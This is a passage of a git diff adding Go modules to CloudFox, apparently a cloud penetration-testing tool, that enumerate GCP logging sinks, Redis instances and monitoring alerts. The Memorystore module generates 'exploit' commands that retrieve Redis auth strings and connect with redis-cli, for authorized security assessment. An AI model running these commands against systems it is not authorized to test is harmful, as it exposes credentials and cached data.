{ + return []string{ + "Project Name", + "Project ID", + "Metric Name", + "Description", + "Filter", + "Type", + } +} + +// getGapsHeader returns the header for logging gaps table +func (m *LoggingModule) getGapsHeader() []string { + return []string{ + "Project", + "Type", + "Resource", + "Location", + "Status", + "Missing Logs", + } +} + +// sinksToTableBody converts sinks to table body rows +func (m *LoggingModule) sinksToTableBody(sinks []LoggingService.SinkInfo) [][]string { + var body [][]string + for _, sink := range sinks { + // Format destination + destination := getDestinationName(sink) + + // Format cross-project + crossProject := "No" + if sink.IsCrossProject { + crossProject = fmt.Sprintf("Yes -> %s", sink.DestinationProject) + } + + // Format disabled + disabled := "No" + if sink.Disabled { + disabled = "Yes" + } + + // Format filter (no truncation) + filter := "-" + if sink.Filter != "" { + filter = normalizeFilter(sink.Filter) + } + + // Format writer identity + writerIdentity := "-" + if sink.WriterIdentity != "" { + writerIdentity = sink.WriterIdentity + } + + body = append(body, []string{ + m.GetProjectName(sink.ProjectID), + sink.ProjectID, + sink.Name, + sink.DestinationType, + destination, + crossProject, + disabled, + writerIdentity, + filter, + }) + } + return body +} + +// metricsToTableBody converts metrics to table body rows +func (m *LoggingModule) metricsToTableBody(metrics []LoggingService.MetricInfo) [][]string { + var body [][]string + for _, metric := range metrics { + // Format filter (no truncation) + filter := "-" + if metric.Filter != "" { + filter = normalizeFilter(metric.Filter) + } + + // Format type + metricType := metric.MetricKind + if metric.ValueType != "" { + metricType += "/" + metric.ValueType + } + + // Format description (no truncation) + description := metric.Description + if description == "" { + description = "-" + } + + body = append(body, []string{ + m.GetProjectName(metric.ProjectID), + metric.ProjectID, + metric.Name, + description, + filter, + metricType, + }) + } + return body +} + +// gapsToTableBody converts logging gaps to table body rows +func (m *LoggingModule) gapsToTableBody(gaps []LoggingService.LoggingGap) [][]string { + var body [][]string + for _, gap := range gaps { + missingLogs := strings.Join(gap.MissingLogs, "; ") + + location := gap.Location + if location == "" { + location = "-" + } + + body = append(body, []string{ + m.GetProjectName(gap.ProjectID), + gap.ResourceType, + gap.ResourceName, + location, + gap.LoggingStatus, + missingLogs, + }) + } + return body +} + +// buildTablesForProject builds table files for a project +func (m *LoggingModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if sinks, ok := m.ProjectSinks[projectID]; ok && len(sinks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", + Header: m.getSinksHeader(), + Body: m.sinksToTableBody(sinks), + }) + } + + if metrics, ok := m.ProjectMetrics[projectID]; ok && len(metrics) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", + Header: m.getMetricsHeader(), + Body: m.metricsToTableBody(metrics), + }) + } + + if gaps, ok := m.ProjectGaps[projectID]; ok && len(gaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-gaps", + Header: m.getGapsHeader(), + Body: m.gapsToTableBody(gaps), + }) + } + + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *LoggingModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectSinks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectMetrics { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectGaps { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LoggingOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGGING_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *LoggingModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allSinks := m.getAllSinks() + allMetrics := m.getAllMetrics() + allGaps := m.getAllGaps() + + // Build table files + tableFiles := []internal.TableFile{} + + if len(allSinks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", + Header: m.getSinksHeader(), + Body: m.sinksToTableBody(allSinks), + }) + } + + if len(allMetrics) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", + Header: m.getMetricsHeader(), + Body: m.metricsToTableBody(allMetrics), + }) + } + + if len(allGaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-gaps", + Header: m.getGapsHeader(), + Body: m.gapsToTableBody(allGaps), + }) + } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := LoggingOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGING_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// getDestinationName returns a human-readable destination name +func getDestinationName(sink LoggingService.SinkInfo) string { + switch sink.DestinationType { + case "storage": + return sink.DestinationBucket + case "bigquery": + return sink.DestinationDataset + case "pubsub": + return sink.DestinationTopic + case "logging": + // Extract bucket name from full path + parts := strings.Split(sink.Destination, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return sink.Destination + default: + return sink.Destination + } +} + +// normalizeFilter normalizes a log filter for display (removes newlines but no truncation) +func normalizeFilter(filter string) string { + // Remove newlines + filter = strings.ReplaceAll(filter, "\n", " ") + filter = strings.ReplaceAll(filter, "\t", " ") + + // Collapse multiple spaces + for strings.Contains(filter, " ") { + filter = strings.ReplaceAll(filter, " ", " ") + } + + return strings.TrimSpace(filter) +} diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go new file mode 100644 index 00000000..3d748cec --- /dev/null +++ b/gcp/commands/memorystore.go @@ -0,0 +1,292 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPMemorystoreCommand = &cobra.Command{ + Use: globals.GCP_MEMORYSTORE_MODULE_NAME, + Aliases: []string{"redis", "cache"}, + Short: "Enumerate Memorystore (Redis) instances", + Long: `Enumerate Memorystore for Redis instances with security analysis. + +Features: +- Lists all Redis instances +- Shows authentication and encryption status +- Identifies network configuration +- Detects security misconfigurations`, + Run: runGCPMemorystoreCommand, +} + +type MemorystoreModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]memorystoreservice.RedisInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type MemorystoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MemorystoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MemorystoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPMemorystoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_MEMORYSTORE_MODULE_NAME) + if err != nil { + return + } + + module := &MemorystoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]memorystoreservice.RedisInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *MemorystoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_MEMORYSTORE_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + if len(allInstances) == 0 { + logger.InfoM("No Memorystore instances found", globals.GCP_MEMORYSTORE_MODULE_NAME) + return + } + + noAuth := 0 + for _, instance := range allInstances { + if !instance.AuthEnabled { + noAuth++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Redis instance(s) (%d without auth)", + len(allInstances), noAuth), globals.GCP_MEMORYSTORE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *MemorystoreModule) getAllInstances() []memorystoreservice.RedisInstanceInfo { + var all []memorystoreservice.RedisInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *MemorystoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Memorystore in project: %s", projectID), globals.GCP_MEMORYSTORE_MODULE_NAME) + } + + svc := memorystoreservice.New() + instances, err := svc.ListRedisInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_MEMORYSTORE_MODULE_NAME, + fmt.Sprintf("Could not list Redis instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectInstances[projectID] = instances + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["memorystore-commands"] = &internal.LootFile{ + Name: "memorystore-commands", + Contents: "# Memorystore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, instance := range instances { + m.addInstanceToLoot(projectID, instance) + } + m.mu.Unlock() +} + +func (m *MemorystoreModule) addInstanceToLoot(projectID string, instance memorystoreservice.RedisInstanceInfo) { + lootFile := m.LootMap[projectID]["memorystore-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# MEMORYSTORE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + "# Host: %s:%d\n"+ + "# Auth: %v, Encryption: %s\n\n", + instance.Name, + instance.ProjectID, instance.Location, + instance.Host, instance.Port, + instance.AuthEnabled, instance.TransitEncryption, + ) + + // gcloud commands + lootFile.Contents += fmt.Sprintf( + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe instance:\n"+ + "gcloud redis instances describe %s --region=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Auth string command (if auth enabled) + if instance.AuthEnabled { + lootFile.Contents += fmt.Sprintf( + "# Get auth string:\n"+ + "gcloud redis instances get-auth-string %s --region=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + } + + // Redis CLI connection command + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + authStr := "" + if instance.AuthEnabled { + authStr = " -a $(gcloud redis instances get-auth-string " + instance.Name + + " --region=" + instance.Location + " --project=" + instance.ProjectID + + " --format='value(authString)')" + } + lootFile.Contents += fmt.Sprintf( + "# Connect to Redis (from a VM in the same VPC):\n"+ + "redis-cli -h %s -p %d%s\n\n", + instance.Host, instance.Port, authStr, + ) +} + +// extractNetworkName extracts the network name from the full resource path +func extractNetworkName(network string) string { + if network == "" { + return "-" + } + parts := strings.Split(network, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return network +} + +func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *MemorystoreModule) getTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Memory (GB)", + "Version", + "Host:Port", + "Auth Enabled", + "Transit Encryption", + "State", + "Network", + "Connect Mode", + } +} + +func (m *MemorystoreModule) instancesToTableBody(instances []memorystoreservice.RedisInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + transitEncryption := instance.TransitEncryption + if transitEncryption == "" { + transitEncryption = "DISABLED" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.Tier, + fmt.Sprintf("%d", instance.MemorySizeGB), + instance.RedisVersion, + fmt.Sprintf("%s:%d", instance.Host, instance.Port), + shared.BoolToYesNo(instance.AuthEnabled), + transitEncryption, + instance.State, + extractNetworkName(instance.AuthorizedNetwork), + instance.ConnectMode, + }) + } + return body +} + +func (m *MemorystoreModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tableFiles := []internal.TableFile{{Name: "memorystore", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = MemorystoreOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } +} + +func (m *MemorystoreModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{Name: "memorystore", Header: m.getTableHeader(), Body: body}} + output := MemorystoreOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } +} diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go new file mode 100644 index 00000000..abd8f4c5 --- /dev/null +++ b/gcp/commands/monitoringalerts.go @@ -0,0 +1,948 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + monitoring "cloud.google.com/go/monitoring/apiv3/v2" + "cloud.google.com/go/monitoring/apiv3/v2/monitoringpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" + +var GCPMonitoringAlertsCommand = &cobra.Command{ + Use: GCP_MONITORINGALERTS_MODULE_NAME, + Aliases: []string{"alerts", "monitoring", "alerting"}, + Hidden: true, + Short: "Enumerate Cloud Monitoring alerting policies and notification channels", + Long: `Analyze Cloud Monitoring alerting policies and notification channels for security gaps. + +Features: +- Lists all alerting policies and their conditions +- Identifies disabled or misconfigured alerts +- Enumerates notification channels and their verification status +- Detects missing critical security alerts +- Identifies uptime check configurations +- Analyzes alert policy coverage gaps + +Required Security Alerts to Check: +- IAM policy changes +- Firewall rule changes +- VPC network changes +- Service account key creation +- Custom role changes +- Audit log configuration changes +- Cloud SQL authorization changes + +Requires appropriate IAM permissions: +- roles/monitoring.viewer +- roles/monitoring.alertPolicyViewer`, + Run: runGCPMonitoringAlertsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AlertPolicy struct { + Name string + DisplayName string + ProjectID string + Enabled bool + Combiner string + Documentation string + Conditions []AlertCondition + NotificationChannels []string // Channel resource names +} + +type AlertCondition struct { + Name string + DisplayName string + ResourceType string + MetricType string + Filter string + ThresholdValue float64 + Duration string + Comparison string + Aggregation string +} + +type NotificationChannel struct { + Name string + DisplayName string + ProjectID string + Type string // email, slack, pagerduty, webhook, sms, pubsub + Enabled bool + Verified bool + Labels map[string]string + CreationTime string + MutationTime string +} + +type UptimeCheck struct { + Name string + DisplayName string + ProjectID string + MonitoredHost string + ResourceType string + Protocol string + Port int32 + Path string + Period string + Timeout string + SelectedRegion []string + Enabled bool + SSLEnabled bool +} + + +// ------------------------------ +// Module Struct +// ------------------------------ +type MonitoringAlertsModule struct { + gcpinternal.BaseGCPModule + + ProjectAlertPolicies map[string][]AlertPolicy // projectID -> policies + ProjectNotificationChannels map[string][]NotificationChannel // projectID -> channels + ProjectUptimeChecks map[string][]UptimeCheck // projectID -> checks + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type MonitoringAlertsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MonitoringAlertsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MonitoringAlertsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPMonitoringAlertsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_MONITORINGALERTS_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &MonitoringAlertsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAlertPolicies: make(map[string][]AlertPolicy), + ProjectNotificationChannels: make(map[string][]NotificationChannel), + ProjectUptimeChecks: make(map[string][]UptimeCheck), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *MonitoringAlertsModule) Execute(ctx context.Context, logger internal.Logger) { + // Create Monitoring client + alertClient, err := monitoring.NewAlertPolicyClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Alert Policy client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer alertClient.Close() + + channelClient, err := monitoring.NewNotificationChannelClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Notification Channel client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer channelClient.Close() + + uptimeClient, err := monitoring.NewUptimeCheckClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Uptime Check client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + } + } + if uptimeClient != nil { + defer uptimeClient.Close() + } + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, alertClient, channelClient, uptimeClient, logger) + } + + // Check results + allPolicies := m.getAllAlertPolicies() + allChannels := m.getAllNotificationChannels() + allChecks := m.getAllUptimeChecks() + + if len(allPolicies) == 0 && len(allChannels) == 0 { + logger.InfoM("No monitoring alerts or notification channels found", GCP_MONITORINGALERTS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d alert policy(ies), %d notification channel(s), %d uptime check(s)", + len(allPolicies), len(allChannels), len(allChecks)), GCP_MONITORINGALERTS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *MonitoringAlertsModule) getAllAlertPolicies() []AlertPolicy { + var all []AlertPolicy + for _, policies := range m.ProjectAlertPolicies { + all = append(all, policies...) + } + return all +} + +func (m *MonitoringAlertsModule) getAllNotificationChannels() []NotificationChannel { + var all []NotificationChannel + for _, channels := range m.ProjectNotificationChannels { + all = append(all, channels...) + } + return all +} + +func (m *MonitoringAlertsModule) getAllUptimeChecks() []UptimeCheck { + var all []UptimeCheck + for _, checks := range m.ProjectUptimeChecks { + all = append(all, checks...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *MonitoringAlertsModule) processProject(ctx context.Context, projectID string, alertClient *monitoring.AlertPolicyClient, channelClient *monitoring.NotificationChannelClient, uptimeClient *monitoring.UptimeCheckClient, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating monitoring for project: %s", projectID), GCP_MONITORINGALERTS_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["monitoring-alerts-commands"] = &internal.LootFile{ + Name: "monitoring-alerts-commands", + Contents: "# Monitoring Alerts Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // List alert policies + m.enumerateAlertPolicies(ctx, projectID, alertClient, logger) + + // List notification channels + m.enumerateNotificationChannels(ctx, projectID, channelClient, logger) + + // List uptime checks + if uptimeClient != nil { + m.enumerateUptimeChecks(ctx, projectID, uptimeClient, logger) + } +} + +func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, projectID string, client *monitoring.AlertPolicyClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListAlertPoliciesRequest{ + Name: parent, + } + + it := client.ListAlertPolicies(ctx, req) + for { + policy, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate alert policies in project %s", projectID)) + break + } + + alertPolicy := AlertPolicy{ + Name: policy.Name, + DisplayName: policy.DisplayName, + ProjectID: projectID, + Enabled: policy.Enabled.GetValue(), + Combiner: policy.Combiner.String(), + NotificationChannels: policy.NotificationChannels, + } + + if policy.Documentation != nil { + alertPolicy.Documentation = policy.Documentation.Content + } + + // Parse conditions + for _, cond := range policy.Conditions { + condition := AlertCondition{ + Name: cond.Name, + DisplayName: cond.DisplayName, + } + + // Parse based on condition type + switch c := cond.Condition.(type) { + case *monitoringpb.AlertPolicy_Condition_ConditionThreshold: + if c.ConditionThreshold != nil { + condition.Filter = c.ConditionThreshold.Filter + condition.Comparison = c.ConditionThreshold.Comparison.String() + condition.ThresholdValue = c.ConditionThreshold.ThresholdValue + + if c.ConditionThreshold.Duration != nil { + condition.Duration = c.ConditionThreshold.Duration.String() + } + + condition.MetricType = m.extractMetricType(c.ConditionThreshold.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionAbsent: + if c.ConditionAbsent != nil { + condition.Filter = c.ConditionAbsent.Filter + condition.MetricType = m.extractMetricType(c.ConditionAbsent.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionMonitoringQueryLanguage: + if c.ConditionMonitoringQueryLanguage != nil { + condition.Filter = c.ConditionMonitoringQueryLanguage.Query + } + } + + alertPolicy.Conditions = append(alertPolicy.Conditions, condition) + } + + m.mu.Lock() + m.ProjectAlertPolicies[projectID] = append(m.ProjectAlertPolicies[projectID], alertPolicy) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateNotificationChannels(ctx context.Context, projectID string, client *monitoring.NotificationChannelClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListNotificationChannelsRequest{ + Name: parent, + } + + it := client.ListNotificationChannels(ctx, req) + for { + channel, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate notification channels in project %s", projectID)) + break + } + + notifChannel := NotificationChannel{ + Name: channel.Name, + DisplayName: channel.DisplayName, + ProjectID: projectID, + Type: channel.Type, + Enabled: channel.Enabled.GetValue(), + Labels: channel.Labels, + } + + // Check verification status + if channel.VerificationStatus == monitoringpb.NotificationChannel_VERIFIED { + notifChannel.Verified = true + } + + if channel.CreationRecord != nil { + notifChannel.CreationTime = channel.CreationRecord.MutateTime.AsTime().String() + } + + // MutationRecords is a slice - get the most recent one + if len(channel.MutationRecords) > 0 { + lastMutation := channel.MutationRecords[len(channel.MutationRecords)-1] + if lastMutation != nil { + notifChannel.MutationTime = lastMutation.MutateTime.AsTime().String() + } + } + + m.mu.Lock() + m.ProjectNotificationChannels[projectID] = append(m.ProjectNotificationChannels[projectID], notifChannel) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, projectID string, client *monitoring.UptimeCheckClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListUptimeCheckConfigsRequest{ + Parent: parent, + } + + it := client.ListUptimeCheckConfigs(ctx, req) + for { + check, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate uptime checks in project %s", projectID)) + break + } + + uptimeCheck := UptimeCheck{ + Name: check.Name, + DisplayName: check.DisplayName, + ProjectID: projectID, + Enabled: !check.IsInternal, // Active checks returned by API are enabled; internal checks are system-managed + } + + // Parse resource type + switch r := check.Resource.(type) { + case *monitoringpb.UptimeCheckConfig_MonitoredResource: + if r.MonitoredResource != nil { + uptimeCheck.ResourceType = r.MonitoredResource.Type + if host, ok := r.MonitoredResource.Labels["host"]; ok { + uptimeCheck.MonitoredHost = host + } + } + } + + // Parse check request details + switch cr := check.CheckRequestType.(type) { + case *monitoringpb.UptimeCheckConfig_HttpCheck_: + if cr.HttpCheck != nil { + uptimeCheck.Protocol = "HTTP" + uptimeCheck.Port = cr.HttpCheck.Port + uptimeCheck.Path = cr.HttpCheck.Path + if cr.HttpCheck.UseSsl { + uptimeCheck.Protocol = "HTTPS" + uptimeCheck.SSLEnabled = true + } + } + case *monitoringpb.UptimeCheckConfig_TcpCheck_: + if cr.TcpCheck != nil { + uptimeCheck.Protocol = "TCP" + uptimeCheck.Port = cr.TcpCheck.Port + } + } + + if check.Period != nil { + uptimeCheck.Period = check.Period.String() + } + + if check.Timeout != nil { + uptimeCheck.Timeout = check.Timeout.String() + } + + // Check regions + for _, region := range check.SelectedRegions { + uptimeCheck.SelectedRegion = append(uptimeCheck.SelectedRegion, region.String()) + } + + m.mu.Lock() + m.ProjectUptimeChecks[projectID] = append(m.ProjectUptimeChecks[projectID], uptimeCheck) + m.mu.Unlock() + } +} + + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *MonitoringAlertsModule) extractMetricType(filter string) string { + // Extract metric type from filter string + // Format: metric.type="..." or resource.type="..." + if strings.Contains(filter, "metric.type=") { + parts := strings.Split(filter, "metric.type=") + if len(parts) > 1 { + metricPart := strings.Split(parts[1], " ")[0] + return strings.Trim(metricPart, "\"") + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *MonitoringAlertsModule) addPolicyToLoot(projectID string, p AlertPolicy) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# POLICY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe alert policy:\n"+ + "gcloud alpha monitoring policies describe %s --project=%s\n\n", + p.DisplayName, + p.ProjectID, + extractResourceName(p.Name), p.ProjectID, + ) +} + +func (m *MonitoringAlertsModule) addChannelToLoot(projectID string, c NotificationChannel) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CHANNEL: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe notification channel:\n"+ + "gcloud alpha monitoring channels describe %s --project=%s\n\n", + c.DisplayName, + c.ProjectID, + extractResourceName(c.Name), c.ProjectID, + ) +} + +func (m *MonitoringAlertsModule) addUptimeCheckToLoot(projectID string, u UptimeCheck) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# UPTIME 